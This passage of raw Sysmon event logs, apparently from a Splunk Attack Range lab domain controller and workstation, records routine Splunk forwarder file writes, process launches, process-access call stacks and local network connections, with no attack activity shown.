Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A507EC01622CA22F1075EC0EBF2F6D82,SHA256=6BF05664C37E721392397713BFD587D78580C37BB69A0B7E74C22A231FB3B2C0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103582Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:57.054{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49528-false10.0.1.12-8089- 23542300x8000000000000000103581Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.769{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE56C9DFE9EC2CFF27C95BAECF8915C5,SHA256=332F314B7B08EC08B55E6B1F3A40E16D30B9DB309DA2E0FFA6DDB0534D6295FA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103580Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B262-615A-CD01-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103579Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103578Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103577Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103576Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103575Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B262-615A-CD01-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103574Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.660{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B262-615A-CD01-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103573Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.661{58E9C193-B262-615A-CD01-00000000FC01}6568C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081455Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:59.973{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5BDD8B47AA9B4F5C692E1D556953BDF2,SHA256=2D9C9640A007AB0B4213813991EDD5EF9BB42275F2D1ECBF493DCE479FF7527A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081454Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:59.973{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59DE8C1E6C626759FE7A7853248B9F88,SHA256=0A2E4077DB7A9C824B26E54DAB47E28FE8BF7FB5D1430C6E60B0BC1F08120D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081453Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:59.848{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E4C280CA324255D04CD03AF8599B107,SHA256=FC569BA8B35188F27BA98AE95BEB92AC983EED79A47941F05D1062CB46E9CE3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103596Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.256{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49529-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000103595Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:58.256{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49529-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 10341000x8000000000000000103594Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.816{58E9C193-B263-615A-CE01-00000000FC01}44804196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103593Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.785{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F10DC16641AD56B24903E426CE7D5627,SHA256=EC7E73FCCBCAD8EF66D46A95FCB451FBA6CCECEF47AEEF88EE1E7C1F593C0B46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103592Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B263-615A-CE01-00000000FC01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103591Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103590Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103589Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103588Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103587Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B263-615A-CE01-00000000FC01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103586Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.597{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B263-615A-CE01-00000000FC01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103585Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.598{58E9C193-B263-615A-CE01-00000000FC01}4480C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103584Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.051{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F62A5A52F95CA91BF51544EB1CC5CDF1,SHA256=DC8E781785A070EA2F3CBEF860CAA910F624809587ADBD774D4AF1D159BE4F9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103583Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:59.051{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=584884200421C4F8C3352F6FA3B487F2,SHA256=882A7A684C15B7A5FBA24ED9CCAC6AF472CDB2A7239F75F7530FC0E7D6F666BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081456Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:00.880{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03F93E513EB1B552614078ABA4F7C041,SHA256=F07710CEAAA803FC0CE613045F00FB83E2B114ABF0ACA92971BFF15017B6146D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103606Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.847{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6666480A76E78CA3DA2B924370048721,SHA256=58389E79330B2CBD39B1FAD36CEB63B2AEDFC7C1597356204E7D5BF18477D722,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103605Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.644{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F62A5A52F95CA91BF51544EB1CC5CDF1,SHA256=DC8E781785A070EA2F3CBEF860CAA910F624809587ADBD774D4AF1D159BE4F9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103604Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.519{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B264-615A-CF01-00000000FC01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103603Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.519{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103602Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.519{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103601Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:00.519{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103600Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 